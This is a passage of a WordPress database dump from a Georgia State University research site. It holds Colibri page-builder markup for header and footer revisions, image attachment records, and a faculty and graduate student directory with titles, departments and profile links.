position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2023-10-12 15:30:01','2023-10-12 19:30:01','',25,'https://gsudice.dataconn.net/?p=1652',0,'revision','',0),(1653,1,'2023-10-12 15:30:01','2023-10-12 19:30:01','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2023-10-12 15:30:01','2023-10-12 19:30:01','',29,'https://gsudice.dataconn.net/?p=1653',0,'revision','',0),(1654,1,'2023-10-12 15:30:01','2023-10-12 19:30:01','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','inherit','closed','closed','','28-revision-v1','','','2023-10-12 15:30:01','2023-10-12 19:30:01','',28,'https://gsudice.dataconn.net/?p=1654',0,'revision','',0),(1658,1,'2023-10-12 16:30:52','2023-10-12 20:30:52','','282038166_2492815234187345_4129762528023780269_n','','inherit','open','closed','','282038166_2492815234187345_4129762528023780269_n','','','2023-10-12 16:30:52','2023-10-12 20:30:52','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/10/282038166_2492815234187345_4129762528023780269_n.jpg',0,'attachment','image/jpeg',0),(1659,1,'2023-10-12 16:31:00','2023-10-12 20:31:00','https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-282038166_2492815234187345_4129762528023780269_n.jpg','cropped-282038166_2492815234187345_4129762528023780269_n.jpg','','inherit','open','closed','','cropped-282038166_2492815234187345_4129762528023780269_n-jpg','','','2023-10-12 16:34:06','2023-10-12 20:34:06','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-282038166_2492815234187345_4129762528023780269_n.jpg',0,'attachment','image/jpeg',0),(1660,1,'2023-10-12 16:36:28','2023-10-12 20:36:28','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-cropped-headshot-1-e1651208089645-1-e1697138345727.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1646,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Portrait-1-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1648,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-SRM-360x360-1.png\",\"caption\":{\"text\":\"\"},\"imageId\":1601,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c195\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c196\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-Hassan-Babaie-300x300-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1636,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c195\",\"index\":2,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c195\",\"index\":1,\"id\":\"182-c199\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c195\",\"index\":1,\"id\":\"182-c200\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c60\",\"parentId\":\"182-c59\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c59\",\"parentId\":\"182-c58\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c58\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c63\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c63\",\"index\":0,\"id\":\"182-c64\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1659,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c63\",\"index\":0,\"id\":\"182-c65\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c63\",\"index\":2,\"id\":\"182-c66\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c63\",\"index\":3,\"id\":\"182-c67\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer 